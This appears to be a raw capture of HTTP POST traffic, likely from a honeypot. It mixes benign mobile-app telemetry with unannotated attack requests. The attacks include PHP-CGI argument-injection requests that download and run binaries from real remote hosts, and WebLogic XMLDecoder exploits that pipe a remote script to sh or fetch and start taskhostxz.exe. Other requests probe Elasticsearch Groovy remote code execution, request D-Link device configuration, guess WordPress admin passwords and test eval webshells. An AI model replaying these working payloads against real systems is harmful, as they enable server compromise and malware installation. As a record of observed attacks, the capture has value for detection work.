User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
™≈˜[Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î´5Y›∆√«∆fl

POST http://batsavcdn.ksmobile.net/bsi HTTP/1.1
Connection: close
User-Agent: CMTalkerSDK.0.0.1
Content-Type: multipart/form-data; boundary=3i2ndDfv2rTHiSisAbouNdArYfORhtTPEefj3q2f
Accept-Language: in_ID
Host: batsavcdn.ksmobile.net
Accept-Encoding: gzip
Transfer-Encoding: chunked

186
Ü
YŸ˛
w€|`9dAVp
Mo)M\WRexTP$fnax]Huíbu(
aJLZgj-: wR"5=dWHmS?\_TT>WVRZce
B>\L0fM%&_A5VHZqjNY^f~rWDTPIhzL^R_g}fRYU@edWAPu/IP6V[H>-^RfycWQNizM\Sgk \Ld{\^2
1AUXiz	QSfyW5^Cq3WAPoe
DrSXRInp@_OH''
rG	O<+<gD[$ADBC
rCUWFu:
aS\XJl}EXUZaqd^BCrW[TXf*L
f_M;{L
3|SeE_
PKmyNOH'k6_VIn~EZ\5|I1EWXTKk+F\P	1/rY;
0



POST http://alog.umeng.com/app_logs HTTP/1.1
X-Umeng-UTC: 1494830722859
X-Umeng-Sdk: Android/6.0.4 Subway+rush%2F1.1.1+MI+4LTE%2F4.4.4+BE6EA616F4A88C79AB737EB2C10FAA27
Msg-Type: envelope/json
Content-Type: envelope/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umeng.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 2319



POST /getcfg.php HTTP/1.1
Accept: */*
Cookie: uid=Zd5iHiPget
Host: x.x.x.x
Content-Type: application/x-www-form-urlencoded
User-Agent: Wget(linux)
Content-Length: 60

A=A%0a_POST_SERVICES%3dDEVICE.ACCOUNT%0aAUTHORIZED_GROUP%3d1

POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: -c
Content-Type: application/x-www-form-urlencoded
Content-Length: 175

<? system("cd /tmp ; wget http://46.105.103.169/eu/lul ; curl -O http://46.105.103.169/eu/lul ; fetch http://46.105.103.169/eu/lul ; chmod +x lul ; perl lul ; rm -rf lul"); ?>

POST /getcfg.php HTTP/1.1
Accept: */*
Cookie: uid=Zd5iHiPget
Host: x.x.x.x
Content-Type: application/x-www-form-urlencoded
User-Agent: Wget(linux)
Content-Length: 60

A=A%0a_POST_SERVICES%3dDEVICE.ACCOUNT%0aAUTHORIZED_GROUP%3d1

POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 18
Cache-Control: no-cache

log=admin&pwd=1720

POST /wls-wsat/ParticipantPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1306
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile(&apos;http://198.50.179.109:8020/taskhostxz.exe&apos;,&apos;C:/Windows/temp/taskhostxz.exe&apos;);Start-Process &apos;C:/Windows/temp/taskhostxz.exe&apos;</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
˛°[Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îlLY›∆√«∆fl

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)
Host: x.x.x.x
Content-Length: 376
Cache-Control: no-cache

EPYMwNLKZ/R3Ztuuv0giHpLOaN2TFcxAB7m3xTBU3XQ6UpxYgyPAD17/Vup9g9yK63Z8aI1KRBwHc+zCceTrLPHBbIrIT4cVWJd5y1q8W1VpR17he6aJtyl5UUmmAms9PGGs44pKpzHst19U51BcQd9DhAk2+xpLrXSItxWdWKEWYL7Elr1ZpOPcsVBtlsUmIZWCpfY2Qo8mYLUmHTDgH/70fW77jbgTwwyM+MzHFDHBdRZAk0N1IMFY+ljE2poAynIZ+cgKVv+kCdld0DScnBTFLXSKQofinafx1H3UHYDMKvqWq1iX74j8qD5Zmji6DKyqVLuYBnfD5YXipA9fgnAwVkQ6q/WcvkuzoQcIU+ApTWlsRsnb3e8=

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
…ùƒ4Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î,¥)Y›∆√«∆fl

post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1079
Content-Type: multipart/form-data; boundary=NT8_saayLCsLgfQ9oWEsCn0ipGm-rvOUnOJOwxyP
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--NT8_saayLCsLgfQ9oWEsCn0ipGm-rvOUnOJOwxyP
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--NT8_saayLCsLgfQ9oWEsCn0ipGm-rvOUnOJOwxyP
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

664258
--NT8_saayLCsLgfQ9oWEsCn0ipGm-rvOUnOJOwxyP
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

2f9f1e34634014df979efa738a3f4fcb
--NT8_saayLCsLgfQ9oWEsCn0ipGm-rvOUnOJOwxyP
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--NT8_saayLCsLgfQ9oWEsCn0ipGm-rvOUnOJOwxyP
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--NT8_saayLCsLgfQ9oWEsCn0ipGm-rvOUnOJOwxyP--


POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 20
Cache-Control: no-cache

log=admin&pwd=admin3

POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: -c
Content-Type: application/x-www-form-urlencoded
Content-Length: 182

<? system("cd /tmp ; wget http://mafiagalati.hi2.ro/unix ; curl -O http://mafiagalati.hi2.ro/unix ; fetch http://mafiagalati.hi2.ro/unix ; chmod +x unix ; ./unix ; rm -rf unix "); ?>

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
∂”â
Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îıÒY›∆√«∆fl

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
…ùƒ4Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î,¥)Y›∆√«∆fl

POST /wls-wsat/ParticipantPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1300
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>cmd.exe /c &quot;@echo open 93.174.93.149&gt;sss.txt&amp;@echo binary&gt;&gt;sss.txt&amp;@echo get /taskhostxz.exe&gt;&gt;sss.txt&amp;@echo quit&gt;&gt;sss.txt&amp;@ftp -s:sss.txt -v -A&amp;@start taskhostxz.exe&quot;</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
˙PbÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÏY›∆√«∆fl

POST /db_session.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

eval=die('Hello, Peppa!'.(string)(111111111*9));

POST http://check.proxyradar.com/azenv.php?auth=149504673575&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST http://check.proxyradar.com/azenv.php?auth=149454221447&a=PSCMN&i=2335900298&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; ASJB; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 432
Cache-Control: no-cache

VgrjznQWWfJDDxm9dl81yJznfQgtOPyMRTtIvP26y1KZ67hBOqyuEfs6poiTc6ufP9RwrAyZkr3H4xPT1ncp1U0gAqI3z8Mvr/q4WU9YHQ1pVHzudxMhHgSsu4q2j5FSSUvxT43q83iJiotR4+eAniDiEUr9mepA9TWG2qeOxB0D3Bb169kkxQUM0JsxxPCF83EDKLeKUIw8IewdwUV25pFzM/ZhyOXZysplwfgzj0BA0ysbh6oSZHT3gfImHPcw1SYvHcFdCp8ZhSfJ85f76Ga0gSFS5Iqk5vz/IZKz6+kbsjcP3AC/bPK4cd0oWMULINNeddX4Wivm61GFaIa0TRmUoufFOXWED7vtM7yh3X0TG6KjDmuyzcyEZ9FBtfKB4HyOobcqzgy6PqACGtqYDX35xYZ5i3omTfKygIu9opDMXDY=

POST http://alog.umeng.com/app_logs HTTP/1.1
X-Umeng-UTC: 1496022803333
X-Umeng-Sdk: Android/6.0.9 Block+Puzzle+Jewel%2F18+MI+4LTE%2F4.4.4+51CDA60BD75DD94418ADE9CC4CEEE046
Msg-Type: envelope/json
Content-Type: envelope/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umeng.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 2600



POST http://ssdk.adkmob.com/rp/ HTTP/1.1
Content-Length: 231
Content-Type: text/plain; charset=ISO-8859-1
Host: ssdk.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36

v=17&ac=50&pos=32518&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":3003,"pkg":"com.mopub.banner","des":"","sug":-1}]

POST http://uc.ucweb.com:80/ HTTP/1.1
Content-Type: text/xml
Accept: application/vnd.wap.xhtml+xml,application/xml,text/vnd.wap.wml,text/html,application/xhtml+xml,image/jpeg;q=0.5,image/png;q=0.5,image/gif;q=0.5,image/*;q=0.6,video/*,audio/*,*/*;q=0.6,/139
User-Agent: UCWEB/2.0 (Linux; U; Opera Mini/7.1.32052/30.3697; id; MI 4LTE Build/KTU84P) U2/1.0.0 UCMini/10.9.0.946 (SpeedMode; Android 4.4.4; MI 4LTE Build/KTU84P) Mobile
X-UCBrowser-Device-UA: Mozilla/5.0 (Linux; U; Android 4.4.4; id; MI_4LTE Build/KTU84P) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1
Content-Length: 469
Host: uc.ucweb.com:80
Connection: Keep-Alive

<assign data="0tiawOjp+Yed19SRsLmnksOI0IKwt6ee3Yvdhqy4osXXiYiH5ay30YvLmtru4KqF34nHiq++uZ7aj8uT8eL204jWm968rPbJisuG2uWst9Kd3JvS5uv509ObpPqhutvzq5vJ3+D94/id3JvF5PyqhcyZm9bg/eTOidfUkefv+9SLm8ne3uz+w9Ob2oa0rLfKsdqBjqPp+MiJ1Yye8eL23syZmcHls7Xyrfub3Pb98tXMmYXS7+mqhYfdy5Pj+u7Xi4TL9Must8WD1o3WvKzW976bycP36+WazIrHgqOu+vie34DXvKymlNebyd7e7OTCn4TLgra+pJbeiNyRoePIw4CEy4K4v6ae3oDagbW7upCIgYuEsu+nhc7XjMf19+fC05uH1vWst9Ka3YDXvKzBlKTBs8HLyMbSmf2o/vXpwYi56rCE7ri1h4/QjY6jrLeI0M6Z"/>

POST http://alog.umengcloud.com/app_logs HTTP/1.1
X-Umeng-UTC: 1496046872803
X-Umeng-Sdk: Android/6.0.9 Block+Puzzle+Jewel%2F18+MI+4LTE%2F4.4.4+51CDA60BD75DD94418ADE9CC4CEEE046
Msg-Type: envelope/json
Content-Type: envelope/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umengcloud.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 2380



POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 24
Cache-Control: no-cache

log=admin&pwd=admin00000

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
∂0B÷Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞î?1Y›∆√«∆fl

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187



POST http://batsavcdn.ksmobile.net/bsi HTTP/1.1
Connection: close
User-Agent: CMTalkerSDK.0.0.1
Content-Type: multipart/form-data; boundary=3i2ndDfv2rTHiSisAbouNdArYfORhtTPEefj3q2f
Accept-Language: in_ID
Host: batsavcdn.ksmobile.net
Accept-Encoding: gzip
Transfer-Encoding: chunked

3f9
/—œÀ
w€|`9dAVp
Mo)M\WRexTP$fnax]Huíbu(
aJLZgj-: wR"5=dWHmS?\_RT>WVW_f|CB+
M?(\A1TLMZ(jOZ[Fu:
aS\XJl}EXUZaqd^BCrW^_b/6@RXOeyX
3pNcUTlyLNOH'kfW\i,A4{
6GS
VIlz
Xa|MrYJCrB@Aus
|CB+
M>/NW"A
8&	? \W~W
dWAPnzrWDTPIhzL^R_g}fRXXOkdWAPu-Wg@XNi+@
Pc}Ti
Ij.AZgk \LYJ;q\]6}LWbAQVW@kqL\W1*i^Cq3WAPbe
Dr^^V@l~E\OH''
rG	O3,
y?M\4M	CT=WVRRo{#\_PMoqG]VZchQZY@qjNYHn}JTi@Q\Okq[bxfB\TA9{G_V^ue
BrDTh+@
Ze*IiGQVUh,MTR\g,W3RLT&jNY[de
DrS_QHlpD[OH''
rG	O2'D6'L@?M@dWAPeq
`_^MZ.jO]R_epeRXQNe|CUT\{kKj_Zd,B^]apI5ES_TMk.^VS3z
eDBCrW	PZ`(Ti@WKexfyWa@WYH?*CNF,kGjWBCrA]PSez
eDZgjD0&GU<AH/'M'9[ HCT=WVR[cqdDCBly@^ZXf|fPVUOipM@A	us
dFWOo,BZZ`,IaSXo}LPXd||L[Zh|]T3,LP3E
Sd*@
Rn|K
iYR@5YAusrRDTPHoqM\PR{kX\rD
s/2gI\4V	V:%NOH"kb_VRT;WVR[b{aVZWHkpA[[Zoe
QrDWU;q[Q`SgA[PMh~
Q_n-cRLMZ-
336
jON]6(hW[M9}CZS2}KShVUOizEUA{2
]r^BCr@ZP[dq
|CB+
M6*MP?K
@
)-W@AuscJLZgyDYQSexdVXYLj|MTOH4kgT_n~@Ub/4F
TN<}U[dySrDCB.@U[fz3PTh)]U_dK
`Aoj@H8k|L[MmyG^QXfe
B>\L0f
5&GY~K
ZqjNY]n{eDCBly@^ZXf|fPVUOipM@A	us
gW
Kk}L
_1zV2A[Wh)LRYgxI|L[Z?-M\4xLPiETTK>q_ZS3+QfT_YI5YAusrRDTP@h|YNus
Q?IHdWAPdz|L[Il}GUQ[by`^ZVLepYNHmkKgVM;xG]_5-K3UXnx@XR3,
rTDTCJe~BX2pMViRVIk}MXT\f+aWZ dNHmx&\\QIkxC]UZge
B>\L0fy(FS<]dWAPge
ArW_TJdzDYS^ay
dR\UT+WVAYfp
dP_RHh+M	
1-
5FXPK?~GYH{kXjSZezL
SSc{Q1EXXj.UP_g/Ih@DM'WV[Fu?
a^^PNjxYNus
Q?IH

<&
2;A5G$jYNHm}cP[MZ.jO]R_epeRXQNe|BX[R{kKj[PNl*@^Q_1KS5BUe{BUSc*eDBCrW\Po}WbB]8-@\Zg+M
`__exEN7*
0



post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 388
Cache-Control: no-cache

EKNZl9/PY58x98dtxlzYzn8W6wndFsMfom6557/4XAuRLSGEn3k+o2ZBIIZVaiU5U7lDk8EK3/je8rELgjHcg2zJeAk2Z1K2g8efIFONQxAJkzB6KZ1JwQk7Fb7EOwNNiMR+BYe6u9xqZpy/Fm+W1lFvgX2G0YfM5Z3sWRHDHoqh1zB9eiaeiuBzzPte1XWZK0fyp89zPhI3xbXq735Z6NfZoeYDFGlMHO0ksvOF9wT0sUKY9iCyYnCrEVt8FYCBUXQIKj7Y6DZTr5Zv6YaRitreIKTi3jf61MJ56ImyEDpyh56YW7kvowqtKtmIRztpkORZFmXUKu7d9spnLSx09AzJG6CNLzs+QvoLSPL5Xrgw3COBRSMNHO/L+j1NEBK3RQ==

POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

axa=die('Hello, Peppa!'.(string)(111111111*9));

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1025
Content-Type: multipart/form-data; boundary=cZO21cwcwnOShCsHHtt9imY0WmkhApO
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--cZO21cwcwnOShCsHHtt9imY0WmkhApO
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--cZO21cwcwnOShCsHHtt9imY0WmkhApO
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

341404
--cZO21cwcwnOShCsHHtt9imY0WmkhApO
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

01488cc2a3e74345bcdd90984a495537
--cZO21cwcwnOShCsHHtt9imY0WmkhApO
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--cZO21cwcwnOShCsHHtt9imY0WmkhApO
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

